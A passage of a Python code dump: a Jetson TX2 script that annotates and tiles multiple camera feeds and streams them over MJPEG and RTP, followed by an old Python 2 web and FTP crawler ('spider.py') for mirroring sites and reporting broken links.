        self.side = side if side else 0

    def area(self):
        """Rectangle area."""
        return abs(self.x1 - self.x0) * abs(self.y1 - self.y0)

    def rect(self):
        """Coordinates as a (x0, x1, y0, y1) tuple."""
        return (self.x0, self.x1, self.y0, self.y1)

    def center(self):
        """Midpoint of the rectangle.

        Fixed: the original returned (width, height) instead of the midpoint.
        """
        return ((self.x0 + self.x1) / 2, (self.y0 + self.y1) / 2)

    def height(self):
        return abs(self.y1 - self.y0)

    def width(self):
        return abs(self.x1 - self.x0)

    def setrect(self, rect):
        """Replace the coordinates from a (x0, x1, y0, y1) sequence."""
        self.x0, self.x1, self.y0, self.y1 = rect

    def copy(self):
        """Independent copy carrying the same coordinates and side."""
        return objRect(self.rect(), self.side)


PAGE="""\
<html>
<head>
<title>Jetson TX2 image proccessing output</title>
</head>
<body>
<center><h1>Joined image</h1></center>
<center><img src="stream.mjpg" width="1740" height="740" /></center>
</body>
</html>
"""


class StreamingHandler(server.BaseHTTPRequestHandler):
    """Serves the index page and an MJPEG stream fed from self.server.Queue."""

    def do_GET(self):
        if self.path == '/':
            # Redirect the root to the index page.
            self.send_response(301)
            self.send_header('Location', '/index.html')
            self.end_headers()
        elif self.path == '/index.html':
            content = PAGE.encode('utf-8')
            self.send_response(200)
            self.send_header('Content-Type', 'text/html')
            self.send_header('Content-Length', len(content))
            self.end_headers()
            self.wfile.write(content)
        elif self.path == '/stream.mjpg':
            self.send_response(200)
            self.send_header('Age', 0)
            self.send_header('Cache-Control', 'no-cache, private')
            self.send_header('Pragma', 'no-cache')
            self.send_header('Content-Type',
                             'multipart/x-mixed-replace; boundary=FRAME')
            self.end_headers()
            try:
                while True:
                    if not self.server.Queue.empty():
                        frame = self.server.Queue.get(False)
                        ret, buf = cv2.imencode('.jpg', frame)
                        # tobytes() replaces the deprecated tostring().
                        frame = buf.tobytes()
                        self.wfile.write(b'--FRAME\r\n')
                        self.send_header('Content-Type', 'image/jpeg')
                        self.send_header('Content-Length', len(frame))
                        self.end_headers()
                        self.wfile.write(frame)
                        # Fixed: was b'\r\r', an invalid multipart terminator.
                        self.wfile.write(b'\r\n')
            except Exception as e:
                # Client disconnects surface here; log and drop the client.
                logging.warning('Removed streaming client %s: %s',
                                self.client_address, str(e))
        else:
            self.send_error(404)
            self.end_headers()


class StreamingServer(socketserver.ThreadingMixIn, server.HTTPServer):
    """Threaded HTTP server; a `Queue` attribute is attached before serving."""
    allow_reuse_address = True
    daemon_threads = True


def cam_reader(cam, queueoutVideo, queueinRect, stop):
    """Reads frames from side camera `cam`, draws detections, queues frames.

    Arguments:
        cam -- index into streamsVideo/streamsRects
        queueoutVideo -- queue receiving (cam, annotated_frame) tuples
        queueinRect -- queue delivering detection dicts from RecognRect
        stop -- multiprocessing.Event requesting shutdown
    """
    cap = cv2.VideoCapture(streamsVideo[cam])
    objdata = []
    no_detect_cnt = 0
    # Fixed: was `while cap:` — a VideoCapture object is always truthy.
    while True:
        if stop.is_set():
            cap.release()
            break
        ret, frame = cap.read()
        if not ret:
            # Fixed: was `pass`, which fell through and used a None frame.
            continue
        # Drop stale detections after ~25 frames without an update.
        if no_detect_cnt >= 25:
            objdata = []
        else:
            no_detect_cnt += 1
        if not queueinRect.empty():
            no_detect_cnt = 0
            objdata = queueinRect.get(False)
        for obj in objdata:
            # Coordinates arrive normalized in [0, 1]; scale to pixels.
            [x0, y0, x1, y1] = obj['objcoord']
            x0 = int(x0 * frame.shape[1])
            x1 = int(x1 * frame.shape[1])
            y0 = int(y0 * frame.shape[0])
            y1 = int(y1 * frame.shape[0])
            frame = cv2.rectangle(frame, (x0, y0), (x1, y1),
                                  color=(0, 255, 0), thickness=3)
            frame = cv2.putText(frame, 'ID = {0:d}'.format(obj['objtype']),
                                (x0 + 6, y1 - 6), cv2.FONT_HERSHEY_DUPLEX,
                                0.8, (255, 0, 0), 2)
        # NOTE(review): frames are queued at native size; concat_frames
        # assumes side frames are 420x234 — confirm the source resolution.
        if not queueoutVideo.full():
            queueoutVideo.put((cam, frame))


def main_cam_reader(queueoutVideo, queueinRect, stop):
    """Reads the main RTSP camera, resizes to 864x486, queues tagged frames."""
    cap = cv2.VideoCapture(streamsVideo[-1])
    objdata = []
    no_detect_cnt = 0
    while True:
        if stop.is_set():
            cap.release()
            break
        ret, frame = cap.read()
        if not ret:
            continue
        frame = cv2.resize(frame, (864, 486))
        # Drop stale detections after ~25 frames without an update.
        if no_detect_cnt >= 25:
            objdata = []
        else:
            no_detect_cnt += 1
        if not queueinRect.empty():
            no_detect_cnt = 0
            objdata = queueinRect.get(False)
        for obj in objdata:
            [x0, y0, x1, y1] = obj['objcoord']
            x0 = int(x0 * frame.shape[1])
            x1 = int(x1 * frame.shape[1])
            y0 = int(y0 * frame.shape[0])
            y1 = int(y1 * frame.shape[0])
            frame = cv2.rectangle(frame, (x0, y0), (x1, y1),
                                  color=(0, 255, 0), thickness=3)
            frame = cv2.putText(frame, 'ID = {0:d}'.format(obj['objtype']),
                                (x0 + 6, y1 - 6), cv2.FONT_HERSHEY_DUPLEX,
                                0.8, (255, 0, 0), 2)
        # Slot 4 is the bottom (main camera) tile on the composed canvas.
        if not queueoutVideo.full():
            queueoutVideo.put((4, frame))


def RecognRect(cam, queueout, objsRectqueue, stop):
    """Polls the detection endpoint for camera `cam` and parses rectangles.

    A record sits between the 'ffffd9' and 'ffaaee' markers; each line yields
    an integer object type (last bare integer) and float coordinates.
    """
    dataresp = ''
    addr = streamsRects[cam]
    while not stop.is_set():
        try:
            response = urllib.request.urlopen(addr)
            dataresp += response.read().decode('utf-8')
            a = dataresp.find('ffffd9')
            b = dataresp.find('ffaaee')
            if a != -1 and b != -1 and b > (a + 6):
                # Renamed from `str`, which shadowed the builtin.
                seg = dataresp[a + 6:b]
                strlist = seg.split('\n')
                objdata = []
                objrects = []
                for i in range(len(strlist) - 1):
                    stri = strlist[i]
                    temp = re.findall(r'\d+', stri)
                    objtype = int(temp[-1])
                    temp = re.findall(r'\d+\.\d*', stri)
                    # Fixed: a bare map() iterator is consumed once and cannot
                    # be indexed by objRect or unpacked again by cam_reader.
                    objcoord = list(map(float, temp))
                    objdata.append({'objcoord': objcoord, 'objtype': objtype})
                    # NOTE(review): objRect expects (x0, x1, y0, y1) but the
                    # consumers unpack (x0, y0, x1, y1) — confirm wire order.
                    objrects.append(objRect(objcoord, cam))
                if objrects and not objsRectqueue.full():
                    objsRectqueue.put(objrects)
                if objdata and queueout.empty():
                    queueout.put(objdata)
                # Discard everything up to and including the end marker.
                dataresp = dataresp[b + 6:]
        except Exception:
            # Network hiccups / parse errors are expected; retry after a pause.
            pass
        time.sleep(0.2)


def concat_frames(queueinVideo, queueout, stop):
    """Tiles incoming frames onto one canvas and streams it as H.264/RTP.

    `queueout` is accepted for interface compatibility but currently unused
    (the composed frame goes straight to the GStreamer pipeline).
    """
    # Tile sizes: four 420x234 side tiles on top, one 864x486 main tile below.
    frame_width = (420, 420, 420, 420, 864)
    frame_height = (234, 234, 234, 234, 486)
    HorGap = 20
    VerGap = 20
    big_frame = np.zeros((VerGap + frame_height[0] + frame_height[-1],
                          3 * HorGap + 4 * frame_width[0], 3), np.uint8)
    big_frame[:] = (39, 27, 23)  # background colour (BGR)
    frame_coord_x = (0, frame_width[0] + HorGap, (frame_width[0] + HorGap) * 2,
                     (frame_width[0] + HorGap) * 3, 0)
    frame_coord_y = (0, 0, 0, 0, frame_height[0] + VerGap)
    gs_pipeline = 'appsrc ! videoconvert ! omxh264enc control-rate=2 bitrate=1000000 ! ' \
                  'video/x-h264, stream-format=(string)byte-stream ! h264parse ! ' \
                  'rtph264pay mtu=1400 ! udpsink host=192.168.0.16 port=8001 sync=false async=false'
    # fourcc=0 lets the GStreamer pipeline decide the encoding; 15 fps.
    vidstreader = cv2.VideoWriter(gs_pipeline, 0, 15,
                                  (big_frame.shape[1], big_frame.shape[0]), True)
    while not stop.is_set():
        if not queueinVideo.empty():
            (cam, frame) = queueinVideo.get(False)
            big_frame[frame_coord_y[cam]:frame_coord_y[cam] + frame_height[cam],
                      frame_coord_x[cam]:frame_coord_x[cam] + frame_width[cam]] = frame
            vidstreader.write(big_frame)
    vidstreader.release()


def server_start(port, queue, stop):
    """Runs the MJPEG HTTP server until interrupted, then raises `stop`."""
    try:
        address = ('', port)
        # Renamed from `server`, which shadowed the http.server module.
        srv = StreamingServer(address, StreamingHandler)
        # Fixed: was the global `queueServer`, which only worked under the
        # fork start method; use the queue actually passed in.
        srv.Queue = queue
        print('Server is running...')
        srv.serve_forever()
    except (KeyboardInterrupt, SystemExit):
        stop.set()


if __name__ == '__main__':
    queueServer = mp.Queue(1)
    queueFrames = mp.Queue(5)
    queueGlobRecognRects = mp.Queue(10)
    StopFlag = mp.Event()
    queueRects = []
    procsDetectRects = []
    procsCamStream = []
    # One detector + one reader process per side camera.
    for cam in range(Ncams):
        queueRects.append(mp.Queue(1))
        procsDetectRects.append(mp.Process(
            target=RecognRect,
            args=(cam, queueRects[cam], queueGlobRecognRects, StopFlag)))
        procsCamStream.append(mp.Process(
            target=cam_reader,
            args=(cam, queueFrames, queueRects[cam], StopFlag)))
    queueRects.append(mp.Queue(1))
    procMainCamStream = mp.Process(target=main_cam_reader,
                                   args=(queueFrames, queueRects[-1], StopFlag))
    ConcatProc = mp.Process(target=concat_frames,
                            args=(queueFrames, queueServer, StopFlag))
    ServerProc = mp.Process(target=server_start,
                            args=(8000, queueServer, StopFlag))

    ConcatProc.start()
    ServerProc.start()
    for cam in range(Ncams):
        procsCamStream[cam].start()
        procsDetectRects[cam].start()
    procMainCamStream.start()

    try:
        # Block until some process requests shutdown via StopFlag.
        while not StopFlag.is_set():
            time.sleep(1)
    except KeyboardInterrupt:
        # Fixed: Ctrl-C previously left the worker processes running.
        StopFlag.set()
    # Give workers a moment to observe the flag, then stop them hard.
    time.sleep(0.1)
    for cam in range(Ncams):
        procsCamStream[cam].terminate()
        procsDetectRects[cam].terminate()
    procMainCamStream.terminate()
    ConcatProc.terminate()
    ServerProc.terminate()
    exit(0)
spider.py
#!/usr/bin/env python from __future__ import generators ## Copyright (c) 1999 - 2003 L. C. Rees. All rights reserved. ## See COPYRIGHT file for license terms. __name__ = 'spider' __version__ = '0.5' __author__ = 'L.C. Rees (xanimal@users.sf.net)' __all__ = ['ftpurls', 'ftppaths', 'weburls', 'ftpmirror', 'ftpspider', 'webpaths', 'webreport', 'webmirror', 'webspider', 'urlreport', 'badurlreport', 'badhtmreport', 'redireport', 'outreport', 'othereport'] '''Multithreaded crawling, reporting, and mirroring for Web and FTP.''' class Spider: '''HTTP and FTP crawling, reporting, and checking''' import os as _os import urllib as _ulib import urlparse as _uparse from os import path as _path from ftplib import FTP as _ftp from time import strftime as _formtime from time import localtime as _localtime from ftplib import error_perm as _ftperr from sgmllib import SGMLParseError as _sperror from robotparser import RobotFileParser as _rparser # Use threads if available try: from threading import Thread as _thread except ImportError: pass _bdsig, _bfsig, _session, _newparser = None, None, None, None # HTML tags with URLs _urltags = {'a':1, 'img':1, 'link':1, 'script':1, 'iframe':1, 'object':1, 'embed':1, 'area':1, 'frame':1, 'applet':1, 'input':1, 'base':1, 'div':1, 'layer':1, 'ilayer':1, 'bgsound':1} # Supported protocols _supported = {'HTTP':1, 'http':1, 'HTTPS':1, 'https':1, 'FTP':1, 'ftp':1} # HTML attributes with URLs _urlattrs = {'href':1, 'src':1, 'data':1} def __init__(self, base=None, width=None, depth=None): '''Initializes a Spider instance and its base attributes Arguments: base -- URL to crawl (default: None) width -- maximum resources to crawl (default: None) depth -- how deep in a hierarchy to crawl (default: None)''' if base: self.base = base else: self.base = None if width: self.width = width else: self.width = None if depth: self.depth = depth else: self.depth = None def _ftpopen(self, base, name='anonymous', password=None, attempts=3): '''Returns FTP client 
session Arguments: base -- FTP server URL name -- login name (default: 'anonymous') password -- login password (default: None) attempts -- number of login attempts to try (default: 3)''' def ftpprompt(tries=0): '''Prompts for FTP username and password Arguments: tries -- number of login attempts''' tries += tries try: self._name = raw_input('Enter login name: ') self._password = raw_input('Enter password: ') session = ftp(base, self._name, self._password) return session # If login attempt fails, retry login except ftperr: if attempts >= tries: session = ftpprompt(tries) return session # Too many login attempts? End program elif attempts <= tries: raise IOError, 'Permission denied.' import sys sys.exit(0) # Assignments self._name, self._password, ftperr = name, password, self._ftperr su, ftp = self._uparse.urlsplit(base), self._ftp # Set URL, path, and strip 'ftp://' off base, path = su[1], '/'.join([su[2], '']) try: session = ftp(base, name, password) # Prompt for username, password if initial arguments are incorrect except ftperr: session = ftpprompt() # Change to remote path if it exits if path: session.cwd(path) return session def ftpmirror(self, l, t=None, b=None, w=200, d=6, n='anonymous', p=None): '''Mirrors an FTP site on a local filesystem Arguments: l -- local filesystem path (default: None) b -- FTP server URL (default: None) t -- number of download threads (default: None) w -- maximum amount of resources to crawl (default: 200) d -- depth in hierarchy to crawl (default: 6) n -- login username (default: 'anonymous') p -- login password (default: None)''' if b: self.ftpspider(b, w, d, n, p) return self._mirror((self.paths, self.urls), l, t) def ftppaths(self, b=None, w=200, d=6, n='anonymous', p=None): '''Returns a list of FTP paths. 
Arguments: b -- FTP server URL (default: None) w -- maximum amount of resources to crawl (default: 200) d -- depth in hierarchy to crawl (default: 6) n -- login username (default: 'anonymous') p -- login password (default: None)''' def sortftp(rdir): '''Returns a list of entries marked as files or directories Arguments: rdir -- remote directory list''' rlist = [] rappend = rlist.append for rl in rdir: # Split remote file based on whitespace ri = rl.split()[-1] # Add tuple of remote item type, permissions & name to rlist if ri not in ('.', '..'): rappend((rl[0], rl[7], ri)) return rlist def visitftp(): '''Extracts contents of an FTP directory''' wd = pwd() if wd[-1] != '/': wd = '/'.join([wd, '']) # Add present working directory to visited directories dirs[wd], rlist = None, [] # Get list of current directory's contents retr('LIST -a', rlist.append) for url in sortftp(rlist): # Test if remote item is a file (indicated by '-') if url[0] == '-': # Resolve path of file purl = ''.join([wd, url[2]]) # Ensure file list don't exceed max number of resources if len(files) >= width: return None # Add files to file dictionary elif purl not in files: files[purl] = None # Test if it's a directory ('d') and allows scanning ('-') elif url[0] == 'd': if url[1] != '-': # Resolve path of directory purl = ''.join([wd, url[2], '/']) # Ensure no recursion beyond depth allowed if len(purl.split('/')) >= depth: dirs[purl] = None # Visit directory if it hasn't been visited yet elif purl not in dirs: # Change to new directory cwd(purl) # Run 'visitftp' on new directory visitftp() # Use classwide attributes if set if b: self.base = b else: b = self.base # Use classwide width if different from method default if self.width and w == 200: width = self.width else: width = w # Use classwide depth if different from method default if self.depth and d == 6: depth = self.depth + 1 else: depth = d + 1 # File and directory dicts files, dirs = {}, {} # Use existing FTP client session if present if 
self._session: ftp = self._session # Create new FTP client session if necessary else: ftp = self._ftpopen(b, n, p) self._session = ftp # Avoid outside namespace lookups cwd, pwd, retr = ftp.cwd, ftp.pwd, ftp.retrlines # Walk FTP site visitftp() # Make path list out of files' keys and return it self.paths = files.keys() self.paths.sort() return self.paths def ftpspider(self, b=None, w=200, d=6, n='anonymous', p=None): '''Returns lists of URLs and paths plus a live FTP client session Arguments: b -- FTP server URL (default: None) w -- maximum amount of resources to crawl (default: 200) d -- depth in hierarchy to crawl (default: 6) n -- login username (default: 'anonymous') p -- login password (default: None)''' if b: ftppaths(b, w, d, n, p) return self.paths, ftpurls(), self._session def ftpurls(self, b=None, w=200, d=6, n='anonymous', p=None): '''Returns a list of FTP URLs Arguments: b -- FTP server URL (default: None) w -- maximum amount of resources to crawl (default: 200) d -- depth in hierarchy to crawl (default: 6) n -- login username (default: 'anonymous') p -- login password (default: None)''' if b: ftppaths(b, w, d, n, p) # Get rid of trailing '/' in base if present before joining if b[-1] == '/': base = b[:-1] else: base = self.base # Get rid of trailing '/' in base if present before joining if base[-1] == '/': base = self.base[:-1] paths = self.paths # Add FTP URL self.urls = [''.join([base, i]) for i in paths] return self.urls def _parserpick(self, old=None): '''Returns a class using the sgmllib parser or the sgmlop parser Arguments: old -- use classic sgmllib SGMLParser''' # Assignments urltags, urlattrs = self._urltags, self._urlattrs # Lists for bad file and bad directory signatures self._bfsig, self._bdsig = [], [] bfsig, bdsig = self._bfsig, self._bdsig # Use faster SGMLParser if available try: from sgmlop import SGMLParser as newparser self._newparser = newparser # If unavailable, use classic SGML parser except ImportError: from sgmllib import 
SGMLParser as oldparser old = 1 # Classes using classic sgmllib SGML Parser if old: from sgmllib import SGMLParser as oldparser # Remove sgmlop parser if present self._newparser = None # UrlExtract class using classic parser class UrlExtract(oldparser): '''Extracts URLs from a SGMLish document''' def reset(self): '''Resets SGML parser and clears lists''' oldparser.reset(self) self.urls, self.text, self.badurl = [], [], None def handle_data(self, data): '''Handles non-markup data''' # Get first 5 lines of non-markup data if len(self.text) <= 5: self.text.append(data) # Compare signature of known bad URL to a new web page if self.text == bfsig: self.badurl = 1 elif self.text == bdsig: self.badurl = 1 def finish_starttag(self, tag, attrs): '''Extracts URL bearing tags''' if tag in urltags: # Get key, vale in attributes if they match url = [v for k, v in attrs if k in urlattrs] if url: self.urls.extend(url) # BadUrl class using classic parser class BadUrl(oldparser): '''Collects results of intentionally incorrect URLs''' def reset(self): '''Resets SGML parser and clears lists''' oldparser.reset(self) self.text = [] def handle_data(self, data): '''Collects lines to profile bad URLs''' # Adds first 5 lines of non-markup data to text if len(self.text) <= 5: self.text.append(data) # If no old flag, use SGMLParser from sgmlop and related classes else: # UrlExtract class using sgmlop parser class UrlExtract: '''Extracts URLs from a SGMLish document''' def __init__(self): '''Resets SGML parser and clears lists''' self.urls, self.text, self.badurl = [], [], None def handle_data(self, data): '''Handles non-markup data''' # Get first 5 lines of non-markup data if len(self.text) <= 5: self.text.append(data) # Compare signature of known bad URL to a new web page if self.text == bfsig: self.badurl = 1 elif self.text == bdsig: self.badurl = 1 def finish_starttag(self, tag, attrs): '''Extracts URL bearing tags''' if tag in urltags: # Get key, vale in attributes if they match url = [v 
for k, v in attrs if k in urlattrs] if url: self.urls.extend(url) # BadUrl class using sgmlop parser class BadUrl: '''Collects results of intentionally incorrect URLs''' def __init__(self): '''Resets SGML parser and clears lists''' self.text = [] def handle_data(self, data): '''Collects lines to profile not found responses''' # Adds first 5 lines of non-markup data to list 'text' if len(self.text) <= 5: self.text.append(data) # Make resulting classes available class wide self._UrlExtract, self._BadUrl = UrlExtract, BadUrl def _webtest(self): '''Generates signatures for identifying bad URLs''' def badurl(url): '''Returns first 5 lines of a bad URL Arguments: url -- Bad URL to open and parse''' # Use different classes if faster SGML Parser is available if self._newparser: # sgmlop parser must have a handler passed to it parser, urlget = self._newparser(), BadUrl() # Pass handler (sgmlop cannot be subclassed) parser.register(urlget) parser.feed(urlopen(url).read()) parser.close() # Use classic parser else: urlget = BadUrl() urlget.feed(urlopen(url).read()) urlget.close() # Return singature of bad URL return urlget.text # Make globals local base, urljoin = self.base, self._uparse.urljoin urlopen, BadUrl = self._ulib.urlopen, self._BadUrl # Generate random string of jibber from string import letters, digits from random import choice, randint jibber = ''.join([letters, digits]) ru = ''.join([choice(jibber) for x in range(randint(1, 30))]) # Builds signature of a bad URL for a file self._bfsig.extend(badurl(urljoin(base, '%s.html' % ru))) # Builds signature of a bad URL for a directory self._bdsig.extend(badurl(urljoin(base,'%s/' % ru))) def _webparser(self, html): '''Parses HTML and returns bad URL indicator and extracted URLs Arguments: html -- HTML data''' # Use different classes if faster SGML Parser is available if self._newparser: # Make instances of SGML parser and URL extracting handler parser, urlget = self._newparser(), self._UrlExtract() # Pass handler to 
parser parser.register(urlget) # Feed data to parser parser.feed(html) parser.close() # Return bad URL indicator and extracted URLs else: urlget = self._UrlExtract() urlget.feed(html) urlget.close() # Return badurl marker and list of child URLS return urlget.badurl, urlget.urls def _webopen(self, base): '''Verifies URL and returns actual URL and extracted child URLs Arguments: base -- tuple containing a URL and its referring URL''' # Assignments good, cbase = self._good, base[0] try: # If webspiders can access URL, open it if self._robot.can_fetch('*', cbase): url = self._ulib.urlopen(cbase) # Otherwise, mark as visited and abort else: self._visited[cbase] = 1 return False # If HTTP error, log bad URL and abort except IOError: self._visited[cbase] = 1 self.badurls.append((base[1], cbase)) return False # Get real URL newbase = url.geturl() # Change URL if different from old URL if newbase != cbase: cbase, base = newbase, (newbase, base[1]) # URLs with mimetype 'text/html" scanned for URLs if url.headers.type == 'text/html': # Feed parser contents = url.read() try: badurl, urls = self._webparser(contents) # Log URL if SGML parser can't parse it except self._sperror: self._visited[cbase], self.badhtm[cbase] = 1, 1 return False url.close() # Return URL and extracted urls if it's good if not badurl: return cbase, urls # If the URL is bad (after BadUrl), stop processing and log URL else: self._visited[cbase] = 1 self.badurls.append((base[1], cbase)) return False # Return URL of non-HTML resources and empty list else: url.close() return cbase, [] def _genverify(self, urls, base): '''Verifies a list of full URL relative to a base URL Arguments: urls -- list of raw URLs base -- referring URL''' # Assignments cache, visit, urlverify = self._cache, self._visited, self._urlverify # Strip file off base URL for joining newbase = base.replace(base.split('/')[-1], '') for url in urls: # Get resolved url and raw child URLs url, rawurls = urlverify(url, base, newbase) # Handle any 
child URLs if rawurls: newurls = {} # Eliminate duplicate URLs for rawurl in rawurls: # Eliminate known visited URLs if rawurl not in visit: newurls[rawurl] = 1 # Put new URLs in cache if present if newurls: cache[url] = newurls # Yield new URL if url: yield url def _multiverify(self, url, base): '''Verifies a full URL relative to a base URL Arguments: url -- a raw URLs base -- referring URL''' # Assignments cache, visited = self._cache, self._visited # Strip file off base URL for joining newbase = base.replace(base.split('/')[-1], '') # Get resolved url and raw child URLs url, rawurls = self._urlverify(url, base, newbase) # Handle any child URLs if rawurls: # Eliminate known visited URLs and duplicates for rawurl in rawurls: # Put new URLs in cache if present if rawurl not in visited: cache[rawurl] = url # Put URL in list of good URLs if url: self._good[url] = 1 def _urlverify(self, url, base, newbase): '''Returns a full URL relative to a base URL Arguments: urls -- list of raw URLs base -- referring URL newbase -- temporary version of referring URL for joining''' # Assignments visited, webopen, other = self._visited, self._webopen, self.other sb, depth, urljoin = self._sb[2], self.depth, self._uparse.urljoin urlsplit, urldefrag = self._uparse.urlsplit, self._uparse.urldefrag outside, redirs, supported = self.outside, self.redirs, self._supported if url not in visited: # Remove whitespace from URL if url.find(' ') != -1: visited[url], url = 1, url.replace(' ', '') if url in visited: return 0, 0 # Remove fragments i.e. 'http:foo/bar#frag' if url.find('#') != -1: visited[url], url = 1, urldefrag(url)[0] if url in visited: return 0, 0 # Process full URLs i.e. 
'http://foo/bar if url.find(':') != -1: urlseg = urlsplit(url) # Block non-FTP, HTTP URLs if urlseg[0] not in supported: # Log as non-FTP/HTTP URL other[url], visited[url] = 1, 1 return 0, 0 # If URL is not in root domain, block it if urlseg[1] not in sb: visited[url], outside[url] = 1, 1 return 0, 0 # Block duplicate root URLs elif not urlseg[2] and urlseg[1] == sb: visited[url] = 1 return 0, 0 # Handle relative URLs i.e. ../foo/bar elif url.find(':') == -1: # Join root domain and relative URL visited[url], url = 1, urljoin(newbase, url) if url in visited: return 0, 0 # Test URL by attempting to open it rurl = webopen((url, base)) if rurl and rurl[0] not in visited: # Get URL turl, rawurls = rurl visited[url], visited[turl] = 1, 1 # If URL resolved to a different URL, process it if turl != url: urlseg = urlsplit(turl) # If URL is not in root domain, block it if urlseg[1] not in sb: # Log as a redirected internal URL redirs[(url, turl)] = 1 return 0, 0 # Block duplicate root URLs elif not urlseg[2] and urlseg[1] == sb: return 0, 0 # If URL exceeds depth, don't process if len(turl.split('/')) >= depth: return 0, 0 # Otherwise return URL else: if rawurls: return turl, rawurls else: return turl, [] else: return 0,0 else: return 0, 0 def _onewalk(self): '''Yields good URLs from under a base URL''' # Assignments cache, genverify = self._cache, self._genverify # End processing if cache is empty while cache: # Fetch item from cache base, urls = cache.popitem() # If item has child URLs, process them and yield good URLs if urls: for url in genverify(urls, base): yield url def _multiwalk(self, threads): '''Extracts good URLs from under a base URL Arguments: threads -- number of threads to run''' def urlthread(url, base): '''Spawns a thread containing a multiverify function Arguments: url -- URL to verify base -- referring URL''' # Create instance of Thread dthread = Thread(target=multiverify, args=(url, base)) # Put in pool pool.append(dthread) # Assignments pool, cache, 
multiverify = [], self._cache, self._multiverify Thread, width, good = self._thread, self.width, self._good # End processing if cache is empty while cache: # Process URLs as long as width not exceeded if len(good) <= width: # Fetch item from cache url, base = cache.popitem() # Make thread if url: urlthread(url, base) # Run threads once pool size is reached if len(pool) == threads or threads >= len(cache): # Start threads for thread in pool: thread.start() # Empty thread pool as threads complete while pool: for thread in pool: if not thread.isAlive(): pool.remove(thread) # End if width reached elif len(good) >= width: break def weburls(self, base=None, width=200, depth=5, thread=None): '''Returns a list of web paths. Arguments: base -- base web URL (default: None) width -- amount of resources to crawl (default: 200) depth -- depth in hierarchy to crawl (default: 5) thread -- number of threads to run (default: None)''' # Assignments self._visited, self._good, self._cache, self.badurls = {}, {}, {}, [] self.redirs, self.outside, self.badhtm, self.other = {}, {}, {}, {} onewalk, good, self._robot = self._onewalk, self._good, self._rparser() uparse, robot, multiwalk = self._uparse, self._robot, self._multiwalk cache = self._cache # Assign width if self.width and width == 200: width = self.width else: self.width = width # sgmlop crashes Python after too many iterations if width > 5000: self._parserpick(1) else: self._parserpick() # Use global base if present if not base: base = self.base # Verify URL and get child URLs newbase, rawurls = self._webopen((base, '')) if newbase: # Change base URL if different if newbase != base: base = newbase # Ensure there's a trailing '/' in base URL if base[-1] != '/': url = list(uparse.urlsplit(base)) url[1] = ''.join([url[1], '/']) base = uparse.urlunsplit(url) # Eliminate duplicates and put raw URLs in cache newurls = {} for rawurl in rawurls: newurls[rawurl] = 1 if newurls: # Cache URLs individually if threads are desired if thread: 
for newurl in newurls: cache[newurl] = base # Cache in group if no threads else: cache[base] = newurls # Make base URL, get split, and put in verified URL list self.base, self._sb = base, base.split('/') self._visited[base], good[base] = 1, 1 # If URL is bad, abort and raise error else: raise IOError, "URL is invalid" # Adjust dept to length of base URL if self.depth and depth == 6: self.depth += len(self._sb) else: self.depth = depth + len(self._sb) # Get robot limits robot.set_url(''.join([base, 'robots.txt'])) robot.read() # Get signature of bad URL self._webtest() # Get good URLs as long as total width isn't exceeded try: # Multiwalk if threaded if thread: self._multiwalk(thread) # Otherwise, use single thread else: for item in onewalk(): # Don't exceed maximum width if len(good) <= width: good[item] = 1 elif len(good) >= width: break # If user interrupts crawl, return what's done except KeyboardInterrupt: pass # Get URLs, sort them, and return list self.urls = good.keys() self.urls.sort() return self.urls def webpaths(self, b=None, w=200, d=5, t=None): '''Returns a list of web paths. 
        Arguments:
        b -- base web URL (default: None)
        w -- amount of resources to crawl (default: 200)
        d -- depth in hierarchy to crawl (default: 5)
        t -- number of threads (default: None)'''
        def pathize():
            '''Strips base URL from full URLs to produce paths'''
            for url in urls:
                # Remove base URL from path list
                url = url.replace(self.base, '')
                # Add default name 'index.html' to root URLs and directories
                if not url:
                    url = 'index.html'
                elif url[-1] == '/':
                    url = ''.join([url, 'index.html'])
                # Verify removal of base URL and remove it if found
                if url.find(':') != -1:
                    url = urlsplit(url)[2:][0]
                yield url
        # Assignments
        urlsplit = self._uparse.urlsplit
        # Run weburls if base passed as an argument
        if b: self.weburls(b, w, d, t)
        # Strip off trailing resource or query from base URL
        if self.base[-1] != '/': self.base = '/'.join(self._sb[:-1])
        urls = self.urls
        # Return path list after stripping base URL
        self.paths = list(pathize())
        return self.paths

    def webmirror(self, root=None, t=None, base=None, width=200, depth=5):
        '''Mirrors a website on a local filesystem

        Arguments:
        root -- local filesystem path (default: None)
        t -- number of threads (default: None)
        base -- base web URL (default: None)
        width -- amount of resources to crawl (default: 200)
        depth -- depth in hierarchy to crawl (default: 5)'''
        if base: self.webspider(base, width, depth, t)
        return self._mirror((self.paths, self.urls), root, t)

    def webspider(self, b=None, w=200, d=5, t=None):
        '''Returns two lists of child URLs and paths

        Arguments:
        b -- base web URL (default: None)
        w -- amount of resources to crawl (default: 200)
        d -- depth in hierarchy to crawl (default: 5)
        t -- number of threads (default: None)'''
        if b: self.weburls(b, w, d, t)
        return self.webpaths(), self.urls

    def badurlreport(self, f=None, b=None, w=200, d=5, t=None):
        '''Pretties up a list of bad URLs

        Arguments:
        f -- output file for report (default: None)
        b -- base web URL (default: None)
        w -- amount of resources to crawl (default: 200)
        d -- depth in hierarchy to crawl (default: 5)
        t -- number of threads (default: None)'''
        if b: self.weburls(b, w, d, t)
        # Format report if information is available
        if self.badurls:
            # Number of bad URLs
            amount = str(len(self.badurls))
            header = '%s broken URLs under %s on %s:\n'
            # Print referring URL pointing to bad URL
            body = '\n'.join([' -> '.join([i[0], i[1]]) for i in self.badurls])
            report = self._formatreport(amount, header, body, f)
            # Return if just getting string
            if report: return report

    def badhtmreport(self, f=None, b=None, w=200, d=5, t=None):
        '''Pretties up a list of unparsed HTML URLs

        Arguments:
        f -- output file for report (default: None)
        b -- base web URL (default: None)
        w -- amount of resources to crawl (default: 200)
        d -- depth in hierarchy to crawl (default: 5)
        t -- number of threads (default: None)'''
        if b: self.weburls(b, w, d, t)
        # Format report if information is available
        if self.badhtm:
            amount = str(len(self.badhtm))
            header = '%s unparsable HTML URLs under %s on %s:\n'
            body = '\n'.join(self.badhtm)
            report = self._formatreport(amount, header, body, f)
            # Return if just getting string
            if report: return report

    def redireport(self, f=None, b=None, w=200, d=5, t=None):
        '''Pretties up a list of URLs redirected to an external URL

        Arguments:
        f -- output file for report (default: None)
        b -- base web URL (default: None)
        w -- amount of resources to crawl (default: 200)
        d -- depth in hierarchy to crawl (default: 5)
        t -- number of threads (default: None)'''
        if b: self.weburls(b, w, d, t)
        # Format report if information is available
        if self.redirs:
            amount = str(len(self.redirs))
            header = '%s redirects to external URLs under %s on %s:\n'
            # Print referring URL pointing to new URL
